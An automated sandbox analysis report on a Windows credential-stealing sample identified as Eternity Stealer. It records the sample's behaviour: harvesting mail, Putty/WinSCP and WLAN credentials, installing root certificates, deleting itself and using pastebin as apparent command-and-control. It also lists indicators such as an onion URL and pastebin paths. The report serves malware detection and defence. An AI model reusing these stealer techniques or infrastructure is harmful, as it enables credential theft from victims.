                Source: C:\Users\user\Desktop\Stealer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\Outlook FilesJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\Outlook FilesJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: Yara matchFile source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Eternity Stealer
                Source: Yara matchFile source: Stealer.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.333992859.0000000000AD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		11
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts11
                Process Injection                		1
                Obfuscated Files or Information                		1
                Credentials in Registry                		34
                System Information Discovery                		Remote Desktop Protocol11
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Install Root Certificate                		Security Account Manager12
                Security Software Discovery                		SMB/Windows Admin Shares1
                Screen Capture                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Timestomp                		NTDS1
                Query Registry                		Distributed Component Object Model1
                Email Collection                		11
                Non-Standard Port                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets1
                Process Discovery                		SSHKeylogging3
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                File Deletion                		Cached Domain Credentials51
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture4
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Modify Registry                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal Capture1
                Proxy                		Exfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job51
                Virtualization/Sandbox Evasion                		Proc Filesystem11
                Remote System Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                Process Injection                		/etc/passwd and /etc/shadow11
                System Network Configuration Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1417452 Sample: Stealer.exe Startdate: 29/03/2024 Architecture: WINDOWS Score: 100 35 Malicious sample detected (through community Yara rule) 2->35 37 Antivirus detection for URL or domain 2->37 39 Antivirus / Scanner detection for submitted sample 2->39 41 7 other signatures 2->41 7 Stealer.exe 13 4 2->7         started        process3 dnsIp4 29 pastebin.com 7->29 31 ip-api.com 208.95.112.1, 49163, 80 TUT-ASUS United States 7->31 33 3 other IPs or domains 7->33 43 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 7->43 45 Installs new ROOT certificates 7->45 47 Tries to steal Mail credentials (via file / registry access) 7->47 51 6 other signatures 7->51 11 cmd.exe 7->11         started        14 cmd.exe 7->14         started        signatures5 49 Connects to a pastebin service (likely for C&C) 29->49 process6 signatures7 53 Uses ping.exe to check the status of other devices and networks 11->53 55 Uses netsh to modify the Windows network and firewall settings 11->55 57 Tries to harvest and steal WLAN passwords 11->57 16 netsh.exe 11->16         started        18 findstr.exe 11->18         started        20 chcp.com 11->20         started        59 Deletes itself after installation 14->59 22 PING.EXE 14->22         started        25 chcp.com 14->25         started        process8 dnsIp9 27 127.0.0.1 unknown unknown 22->27

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Stealer.exe100%AviraHEUR/AGEN.1307453
                Stealer.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa100%Avira URL Cloudmalware
                http://pastebin.comp0%Avira URL Cloudsafe
                http://t.mep0%Avira URL Cloudsafe
                https://cdn5.cdn-telegram.org/file/urI_EKpgc2j3bnVEG7hJPiftbxwqp29Csge9PUwai_V9SyHDH8vYkc30DN237hWwA0%Avira URL Cloudsafe
                http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                t.me
                		149.154.167.99
                		truefalse
                  		high
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high
                    pastebin.com
                    		172.67.34.170
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://ip-api.com/jsonfalse
                        		high
                        https://pastebin.com/raw/X2Ddjiv0false
                          		high
                          https://t.me/tor_proxiesfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabStealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://crl.entrust.net/server1.crl0Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://web.telegram.orgStealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://pastebin.compStealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ocsp.entrust.net03Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aaStealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmptrue
                                    • 2%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://pastebin.com/raw/X2Ddjiv0pStealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://support.google.com/chrome/?p=plugin_flashStealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.diginotar.nl/cps/pkioverheid0Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchStealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://t.me/tor_proxiespStealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/L1ghtM4n/TorProxy/blob/main/LIB/Tor.zip?raw=trueStealer.exefalse
                                                		high
                                                https://www.google.com/favicon.icoStealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://cdn5.cdn-telegram.org/file/urI_EKpgc2j3bnVEG7hJPiftbxwqp29Csge9PUwai_V9SyHDH8vYkc30DN237hWwAStealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://pastebin.com/raw/criptionStealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ac.ecosia.org/autocomplete?q=Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://ip-api.comStealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://pastebin.com/raw/Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://t.meStealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://t.mepStealer.exe, 00000000.00000002.466413641.00000000023AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://ocsp.entrust.net0DStealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameStealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://secure.comodo.com/CPS0Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://pastebin.comStealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://t.meStealer.exe, 00000000.00000002.466413641.00000000023AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://pastebin.comStealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://crl.entrust.net/2048ca.crl0Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            208.95.112.1
                                                                            		ip-api.comUnited States
                                                                            		53334TUT-ASUSfalse
                                                                            172.67.34.170
                                                                            		pastebin.comUnited States
                                                                            		13335CLOUDFLARENETUSfalse
                                                                            149.154.167.99
                                                                            		t.meUnited Kingdom
                                                                            		62041TELEGRAMRUfalse
                                                                            188.166.166.142
                                                                            		unknownNetherlands
                                                                            		14061DIGITALOCEAN-ASNUSfalse

                                                                            Private

                                                                            IP
                                                                            127.0.0.1

                                                                            General Information

                                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                                            Analysis ID:1417452
                                                                            Start date and time:2024-03-29 10:30:02 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 3m 52s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                            Number of analysed new started processes analysed:11
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Stealer.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@15/0@5/5
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 16
                                                                            • Number of non-executed functions: 7
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Stop behavior analysis, all processes terminated

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            10:30:44API Interceptor969x Sleep call for process: Stealer.exe modified
                                                                            10:30:47API Interceptor3x Sleep call for process: netsh.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            208.95.112.1DHL_LHER000678175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            assento 555 pro-Model-2.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            ocrev ns.ordine 290520280324.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            YPT23-117419 numaral#U0131 Dekont-20240328.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            FedEx_AWB#53203024643.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            QUOTATION_MARQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            T_240369_S#U0130PAR#U0130S.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            QUOTATION_MARQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exeGet hashmaliciousPureLog Stealer, Xehook StealerBrowse
                                                                            • ip-api.com/json/?fields=11827
                                                                            x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            172.67.34.170SecuriteInfo.com.Win32.Evo-gen.26417.20881.exeGet hashmaliciousAsyncRATBrowse
                                                                            • pastebin.com/raw/KKpnJShN
                                                                            file.exeGet hashmaliciousRedLineBrowse
                                                                            • pastebin.com/raw/r0KhEEzi
                                                                            file.exeGet hashmaliciousRedLineBrowse
                                                                            • pastebin.com/raw/r0KhEEzi
                                                                            taRcbIUWK9.vbeGet hashmaliciousMailPassViewBrowse
                                                                            • pastebin.com/raw/zye80t2a
                                                                            fv7gA5kh4j.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                            • pastebin.com/raw/r0KhEEzi
                                                                            SecuriteInfo.com.Trojan.Heur2.sNW@If4VDppi.27877.25664.exeGet hashmaliciousUnknownBrowse
                                                                            • pastebin.com/raw/r0KhEEzi
                                                                            file.exeGet hashmaliciousRedLineBrowse
                                                                            • pastebin.com/raw/r0KhEEzi
                                                                            vhQgySRol1.exeGet hashmaliciousRedLineBrowse
                                                                            • pastebin.com/raw/r0KhEEzi
                                                                            SrfFpGhGIc.exeGet hashmaliciousVjW0rm, WSHRATBrowse
                                                                            • pastebin.com/raw/WVFt9GbZ
                                                                            Y9IlbIEYjk.exeGet hashmaliciousVjW0rm, WSHRATBrowse
                                                                            • pastebin.com/raw/A2n1xGpr

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            t.mehttps://crm.mr.bet/track/click/c95d3si4y/c6561686462716b65686f62737c6569704564657e23756c6b69627b6e23616?target=https%3A%2F%2Fcrm.mr.bet%2Funsubscribe%2Findex%2FeyJtYWlsIjoibGVhaGRyYWtlaG9yc2xleUBlZHUuc2Vsa2lyay5jYSIsInByb2plY3QiOjMsImJ1bGsiOjYzNjg3MjIsInNpZ24iOiJDQVRQRjhRdzRRcXBpK2tcL2RFckprVmY4N0hrPSJ9Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            nUswWbPPmT.ocx.dllGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            nUswWbPPmT.ocx.dllGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            Incident_Report_Harassment_by_Employee.docGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            Incident_Report_Harassment_by_Employee.docGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            https://drive.google.com/file/d/1mEtwMuIQi_Lxv2UbohD3NjVhr3AzgDZX/view?usp=drive_webGet hashmaliciousQuasarBrowse
                                                                            • 172.67.191.176
                                                                            https://xsptsdj.cn/Get hashmaliciousUnknownBrowse
                                                                            • 151.101.1.195
                                                                            https://frz.ywv.mybluehost.me/myBRT/home/paket.phpGet hashmaliciousUnknownBrowse
                                                                            • 162.241.225.39
                                                                            dump2_cut.exeGet hashmaliciousRaccoonBrowse
                                                                            • 172.67.173.121
                                                                            dump2_cut.exeGet hashmaliciousRaccoonBrowse
                                                                            • 104.21.30.173
                                                                            ip-api.comDHL_LHER000678175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            assento 555 pro-Model-2.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 208.95.112.1
                                                                            ocrev ns.ordine 290520280324.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 208.95.112.1
                                                                            YPT23-117419 numaral#U0131 Dekont-20240328.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            FedEx_AWB#53203024643.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            QUOTATION_MARQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            T_240369_S#U0130PAR#U0130S.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            QUOTATION_MARQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exeGet hashmaliciousPureLog Stealer, Xehook StealerBrowse
                                                                            • 208.95.112.1
                                                                            x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                            • 208.95.112.1
                                                                            pastebin.cominvoicee.vbsGet hashmaliciousUnknownBrowse
                                                                            • 172.67.34.170
                                                                            chrome.exeGet hashmaliciousXWormBrowse
                                                                            • 172.67.34.170
                                                                            UU5WXfH85a.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            • 172.67.34.170
                                                                            WKn5bYRJGH.exeGet hashmaliciousLimeRATBrowse
                                                                            • 172.67.34.170
                                                                            857SmDlK42.exeGet hashmaliciousUnknownBrowse
                                                                            • 104.20.68.143
                                                                            857SmDlK42.exeGet hashmaliciousDCRatBrowse
                                                                            • 172.67.34.170
                                                                            https://drive.google.com/file/d/1Y8n0jZgokB9jmAStRSvrj63LyXRj9rrA/view?usp=drive_webGet hashmaliciousQuasarBrowse
                                                                            • 172.67.34.170
                                                                            762544342.vbsGet hashmaliciousXWormBrowse
                                                                            • 172.67.34.170
                                                                            2132544253.vbsGet hashmaliciousXWormBrowse
                                                                            • 104.20.68.143
                                                                            #U7a3d.#U67e5.#U4f01.#U4e1a.#U540d.#U5355.#U624b#U518c.exeGet hashmaliciousUnknownBrowse
                                                                            • 104.20.67.143

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSMXpl6HFisn.exeGet hashmaliciousRisePro StealerBrowse
                                                                            • 104.26.5.15
                                                                            https://airdrop-online-altlayer-anniversary.s3.us-east-2.amazonaws.com/posten.html?cid=freetomfr@hotmail.comGet hashmaliciousPhisherBrowse
                                                                            • 172.64.150.248
                                                                            7ITPeT3VWW.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.38.98
                                                                            l2ZKczbGRq.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                            • 104.26.4.15
                                                                            XqC4Zcp8qg.exeGet hashmaliciousRisePro StealerBrowse
                                                                            • 104.26.5.15
                                                                            3MdZ1WiAYP.exeGet hashmaliciousRisePro StealerBrowse
                                                                            • 172.67.75.166
                                                                            7GofFHQDvk.exeGet hashmaliciousRisePro StealerBrowse
                                                                            • 172.67.75.166
                                                                            TBC#01 Rev.A3 - lnexa.xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 104.26.12.205
                                                                            DHL_LHER000678175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 172.67.74.152
                                                                            inpau292101.jsGet hashmaliciousFormBookBrowse
                                                                            • 172.67.215.45
                                                                            TELEGRAMRUSecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeGet hashmaliciousClipboard Hijacker, XWorm, XmrigBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exeGet hashmaliciousDiscord Token Stealer, XenoRAT, XmrigBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                            • 149.154.167.220
                                                                            aMObJ2eTUf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                                                            • 149.154.167.220
                                                                            iY40ylvr5y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            • 149.154.167.220
                                                                            DHL9407155789...exeGet hashmaliciousDarkCloudBrowse
                                                                            • 149.154.167.220
                                                                            https://moodle-projects.wolfware.ncsu.edu/Shibboleth.sso/Logout?return=https://owa-storage-limitt.s3.us-east-2.amazonaws.com/owa-2024.html?uid=dGVzdEB0ZXN0LmNvbQoGet hashmaliciousHTMLPhisherBrowse
                                                                            • 149.154.167.220
                                                                            lnvoice-1445766252.pdf.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                            • 149.154.167.220
                                                                            JUSTIF.TRANSF..exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 149.154.167.220
                                                                            DIGITALOCEAN-ASNUSMcb5K3TOWT.exeGet hashmaliciousUnknownBrowse
                                                                            • 37.139.22.180
                                                                            mips.elfGet hashmaliciousMiraiBrowse
                                                                            • 139.59.86.211
                                                                            https://ckydb04.na1.hubspotlinks.com/Ctc/OP+113/cKydB04/VW9bQw4skpv3N4QMDhk6pMpJW5g6HvJ5ccjQdN61zzVd3qn9gW7lCdLW6lZ3m-VBhZqP2fNwFyN40GRrrMQlZ-N2TdQmJ13Y6QW10XVPX3kbMHcN4L237-7KHZ5W1zLF7f8GbdtBW2ZKqmb4N84ZcW3QDpzS6S7KJJW5X7x_l7b4v9TW2F362D3Hh1s9W54lklM4T0vLxN7h7S8FNlcHjW20Y8Mn2bFBzVW9hqyrD48FY07W1SGLwZ5DF_9-W40HntB7qL0THW1mF8BY3vVj3gW2n5NX74XPrGTW45qZ3V6l-BrTN7CsbcvdfdyCW5951f94y1-HGN8ZFSwmVlSf3W5fSXSN3-n9KQW8hNdv46-Q6rkf7QDZST04Get hashmaliciousUnknownBrowse
                                                                            • 174.138.88.94
